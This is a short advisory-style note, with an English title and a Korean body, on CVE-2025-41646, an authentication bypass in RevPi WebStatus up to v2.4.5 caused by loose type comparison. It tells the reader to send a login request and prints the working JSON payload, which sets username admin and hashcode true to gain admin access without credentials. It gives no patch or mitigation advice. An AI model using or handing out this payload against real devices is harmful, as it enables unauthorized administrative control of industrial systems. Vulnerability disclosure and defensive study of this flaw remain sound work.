
CVE-2025-41646 - Critical Authentication bypass
CVE-2025-41646 - 중요 인증 우회
RevPi WebStatus ≤ v2.4.5의 심각한 인증 우회 취약점(CVE-2025-41646)으로 인해 공격자는 약한 타입 비교 로직(== vs ===)으로 인해 유효한 자격 증명 없이 admin으로 로그인할 수 있습니다.
다음과 같은 로그인 요청을 보내십시오:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}